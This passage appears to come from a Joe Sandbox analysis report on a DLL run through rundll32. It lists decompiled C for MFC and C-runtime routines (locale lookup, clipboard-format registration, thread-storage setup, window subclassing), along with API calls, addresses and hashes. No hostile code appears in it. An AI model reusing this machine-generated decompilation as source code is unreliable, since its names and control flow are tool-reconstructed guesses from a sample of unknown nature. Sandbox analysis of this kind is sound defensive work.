                                                                                                                                    0x10014e86
                                                                                                                                    0x10014e89
                                                                                                                                    0x10014ea0
                                                                                                                                    0x10014ea7
                                                                                                                                    0x10014eb6
                                                                                                                                    0x10014fec
                                                                                                                                    0x10014ff3
                                                                                                                                    0x10015003
                                                                                                                                    0x10015006
                                                                                                                                    0x10015009
                                                                                                                                    0x10015010
                                                                                                                                    0x10015013
                                                                                                                                    0x1001501a
                                                                                                                                    0x10015026
                                                                                                                                    0x10015030
                                                                                                                                    0x10015035
                                                                                                                                    0x10015035
                                                                                                                                    0x1001503a
                                                                                                                                    0x1001503f
                                                                                                                                    0x1001505c
                                                                                                                                    0x1001505c
                                                                                                                                    0x10015063
                                                                                                                                    0x10015068
                                                                                                                                    0x00000000
                                                                                                                                    0x10015041
                                                                                                                                    0x10015041
                                                                                                                                    0x10015048
                                                                                                                                    0x10015050
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10015052
                                                                                                                                    0x10015056
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10015058
                                                                                                                                    0x1001505a
                                                                                                                                    0x00000000
                                                                                                                                    0x1001505a
                                                                                                                                    0x10014ebc
                                                                                                                                    0x10014ebc
                                                                                                                                    0x1001506a
                                                                                                                                    0x1001506d
                                                                                                                                    0x10015075
                                                                                                                                    0x10015076
                                                                                                                                    0x10015077
                                                                                                                                    0x1001508c
                                                                                                                                    0x1001508c

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                    • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                    • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                                    • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                                    • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                                    • _memset.LIBCMT ref: 10014FF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                    • API String ID: 434808117-483790700
                                                                                                                                    • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                    • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                                    • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                    • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E1002E129(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                                    0x1002e136
                                                                                                                                    0x1002e13f
                                                                                                                                    0x1002e148
                                                                                                                                    0x1002e152
                                                                                                                                    0x1002e15c
                                                                                                                                    0x1002e166
                                                                                                                                    0x1002e170
                                                                                                                                    0x1002e17a
                                                                                                                                    0x1002e184
                                                                                                                                    0x1002e18e
                                                                                                                                    0x1002e198
                                                                                                                                    0x1002e1a2
                                                                                                                                    0x1002e1a7
                                                                                                                                    0x1002e1ae

                                                                                                                                    APIs
                                                                                                                                    • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                                    • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                                    • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                                    • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                                    • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                                    • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                                    • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                                    • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                                    • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                                    • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClipboardFormatRegister
                                                                                                                                    • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                    • API String ID: 1228543026-2889995556
                                                                                                                                    • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                    • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                                    • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                    • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E1003548E(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x10057934;
					_t41 = TlsSetValue;
					 *0x10057940 = _t7;
					if( *0x10057934 == 0) {
						L6:
						 *0x10057938 = TlsGetValue;
						 *0x10057934 = E10035111;
						 *0x1005793c = _t41;
						 *0x10057940 = TlsFree;
					} else {
						__eflags =  *0x10057938;
						if( *0x10057938 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005793c;
							if( *0x1005793c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x100547c8 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10057938);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100310CD();
							 *0x10057934 = E10035042( *0x10057934);
							 *0x10057938 = E10035042( *0x10057938);
							 *0x1005793c = E10035042( *0x1005793c);
							 *0x10057940 = E10035042( *0x10057940);
							_t18 = E10035923();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10035178(_t37);
								goto L15;
							} else {
								_push(E10035304);
								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
								__eflags = _t21 - 0xffffffff;
								 *0x100547c4 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E10035840(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x100547c4);
										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E100351B5(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10035178(_t37);
					return 0;
				}
			}

















                                                                                                                                    0x1003548e
                                                                                                                                    0x1003548e
                                                                                                                                    0x1003549a
                                                                                                                                    0x1003549e
                                                                                                                                    0x100354be
                                                                                                                                    0x100354cb
                                                                                                                                    0x100354d8
                                                                                                                                    0x100354dd
                                                                                                                                    0x100354df
                                                                                                                                    0x100354e6
                                                                                                                                    0x100354ec
                                                                                                                                    0x100354f1
                                                                                                                                    0x10035509
                                                                                                                                    0x1003550e
                                                                                                                                    0x10035518
                                                                                                                                    0x10035522
                                                                                                                                    0x10035528
                                                                                                                                    0x100354f3
                                                                                                                                    0x100354f3
                                                                                                                                    0x100354fa
                                                                                                                                    0x00000000
                                                                                                                                    0x100354fc
                                                                                                                                    0x100354fc
                                                                                                                                    0x10035503
                                                                                                                                    0x00000000
                                                                                                                                    0x10035505
                                                                                                                                    0x10035505
                                                                                                                                    0x10035507
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10035507
                                                                                                                                    0x10035503
                                                                                                                                    0x100354fa
                                                                                                                                    0x1003552d
                                                                                                                                    0x10035533
                                                                                                                                    0x10035536
                                                                                                                                    0x1003553b
                                                                                                                                    0x1003560d
                                                                                                                                    0x1003560d
                                                                                                                                    0x1003560d
                                                                                                                                    0x10035541
                                                                                                                                    0x10035548
                                                                                                                                    0x1003554a
                                                                                                                                    0x1003554c
                                                                                                                                    0x00000000
                                                                                                                                    0x10035552
                                                                                                                                    0x10035552
                                                                                                                                    0x10035568
                                                                                                                                    0x10035578
                                                                                                                                    0x10035588
                                                                                                                                    0x10035595
                                                                                                                                    0x1003559a
                                                                                                                                    0x1003559f
                                                                                                                                    0x100355a1
                                                                                                                                    0x10035608
                                                                                                                                    0x10035608
                                                                                                                                    0x00000000
                                                                                                                                    0x100355a3
                                                                                                                                    0x100355a3
                                                                                                                                    0x100355b4
                                                                                                                                    0x100355b6
                                                                                                                                    0x100355b9
                                                                                                                                    0x100355be
                                                                                                                                    0x00000000
                                                                                                                                    0x100355c0
                                                                                                                                    0x100355cc
                                                                                                                                    0x100355ce
                                                                                                                                    0x100355d2
                                                                                                                                    0x00000000
                                                                                                                                    0x100355d4
                                                                                                                                    0x100355d4
                                                                                                                                    0x100355d5
                                                                                                                                    0x100355e9
                                                                                                                                    0x100355eb
                                                                                                                                    0x00000000
                                                                                                                                    0x100355ed
                                                                                                                                    0x100355ed
                                                                                                                                    0x100355ef
                                                                                                                                    0x100355f0
                                                                                                                                    0x100355f7
                                                                                                                                    0x100355fd
                                                                                                                                    0x10035601
                                                                                                                                    0x10035605
                                                                                                                                    0x10035605
                                                                                                                                    0x100355eb
                                                                                                                                    0x100355d2
                                                                                                                                    0x100355be
                                                                                                                                    0x100355a1
                                                                                                                                    0x1003554c
                                                                                                                                    0x10035611
                                                                                                                                    0x100354a0
                                                                                                                                    0x100354a0
                                                                                                                                    0x100354a8
                                                                                                                                    0x100354a8

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                                    • __mtterm.LIBCMT ref: 100354A0
                                                                                                                                      • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                                      • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                                    • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                                    • __init_pointers.LIBCMT ref: 10035552
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                                    • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                                    • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                                    • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                    • API String ID: 4287529916-3819984048
                                                                                                                                    • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                    • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                                    • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                    • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E10030D90(E1004429C, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E10015B30);
				 *(_t117 - 0x120) = _t111;
				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E100201F1(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x10057854;
						if( *0x10057854 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x10057454;
								if( *0x10057454 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E10030030(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x10057454 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E10032D2F(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E1001B083(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
							__eflags = _t83 - E1001B780;
							if(_t83 != E1001B780) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E1001F30C();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E10014B55(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E10030E13(_t94, _t106, _t111);
				}
			}



























                                                                                                                                    0x1001c915
                                                                                                                                    0x1001c915
                                                                                                                                    0x1001c915
                                                                                                                                    0x1001c91f
                                                                                                                                    0x1001c924
                                                                                                                                    0x1001c927
                                                                                                                                    0x1001c92a
                                                                                                                                    0x1001c934
                                                                                                                                    0x1001c93a
                                                                                                                                    0x1001c941
                                                                                                                                    0x1001c943
                                                                                                                                    0x1001c946
                                                                                                                                    0x1001c94e
                                                                                                                                    0x1001c950
                                                                                                                                    0x1001c950
                                                                                                                                    0x1001c959
                                                                                                                                    0x1001c96e
                                                                                                                                    0x1001c970
                                                                                                                                    0x1001c973
                                                                                                                                    0x1001c978
                                                                                                                                    0x1001c97a
                                                                                                                                    0x1001c97e
                                                                                                                                    0x1001c984
                                                                                                                                    0x1001c99b
                                                                                                                                    0x1001c99b
                                                                                                                                    0x1001c9a2
                                                                                                                                    0x1001c9ef
                                                                                                                                    0x1001c9ef
                                                                                                                                    0x1001c9f1
                                                                                                                                    0x1001ca59
                                                                                                                                    0x1001ca61
                                                                                                                                    0x1001ca9d
                                                                                                                                    0x1001caa9
                                                                                                                                    0x1001cab0
                                                                                                                                    0x1001cae2
                                                                                                                                    0x1001cae5
                                                                                                                                    0x1001caeb
                                                                                                                                    0x1001caed
                                                                                                                                    0x1001caf0
                                                                                                                                    0x1001caf8
                                                                                                                                    0x1001caff
                                                                                                                                    0x1001cb01
                                                                                                                                    0x1001cb03
                                                                                                                                    0x1001cb0a
                                                                                                                                    0x1001cb12
                                                                                                                                    0x1001cb14
                                                                                                                                    0x1001cb17
                                                                                                                                    0x1001cb1a
                                                                                                                                    0x1001cb28
                                                                                                                                    0x1001cb28
                                                                                                                                    0x1001cb17
                                                                                                                                    0x1001cb03
                                                                                                                                    0x1001cb2e
                                                                                                                                    0x1001cb34
                                                                                                                                    0x1001cb40
                                                                                                                                    0x1001cb46
                                                                                                                                    0x1001cb4d
                                                                                                                                    0x1001cb4f
                                                                                                                                    0x1001cb54
                                                                                                                                    0x1001cb5a
                                                                                                                                    0x1001cb5a
                                                                                                                                    0x1001cb5a
                                                                                                                                    0x1001cb5a
                                                                                                                                    0x00000000
                                                                                                                                    0x1001cb5e
                                                                                                                                    0x00000000
                                                                                                                                    0x1001cab2
                                                                                                                                    0x1001ca65
                                                                                                                                    0x1001ca70
                                                                                                                                    0x1001ca7b
                                                                                                                                    0x1001ca81
                                                                                                                                    0x1001ca87
                                                                                                                                    0x1001ca88
                                                                                                                                    0x1001ca8a
                                                                                                                                    0x1001ca92
                                                                                                                                    0x1001ca95
                                                                                                                                    0x1001ca9b
                                                                                                                                    0x1001cac1
                                                                                                                                    0x1001cac7
                                                                                                                                    0x1001cac9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1001cad3
                                                                                                                                    0x1001cad7
                                                                                                                                    0x1001cadc
                                                                                                                                    0x1001cae0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1001cae0
                                                                                                                                    0x00000000
                                                                                                                                    0x1001ca9b
                                                                                                                                    0x1001c9f9
                                                                                                                                    0x1001c9fe
                                                                                                                                    0x1001ca05
                                                                                                                                    0x1001ca0e
                                                                                                                                    0x1001ca24
                                                                                                                                    0x1001ca26
                                                                                                                                    0x1001ca2c
                                                                                                                                    0x1001ca2e
                                                                                                                                    0x1001ca30
                                                                                                                                    0x1001ca30
                                                                                                                                    0x1001ca38
                                                                                                                                    0x1001ca3c
                                                                                                                                    0x1001ca40
                                                                                                                                    0x1001ca44
                                                                                                                                    0x1001ca4a
                                                                                                                                    0x1001ca4d
                                                                                                                                    0x1001ca4f
                                                                                                                                    0x1001ca4f
                                                                                                                                    0x00000000
                                                                                                                                    0x1001ca44
                                                                                                                                    0x1001c9a7
                                                                                                                                    0x1001c9ad
                                                                                                                                    0x1001c9b2
                                                                                                                                    0x00000000
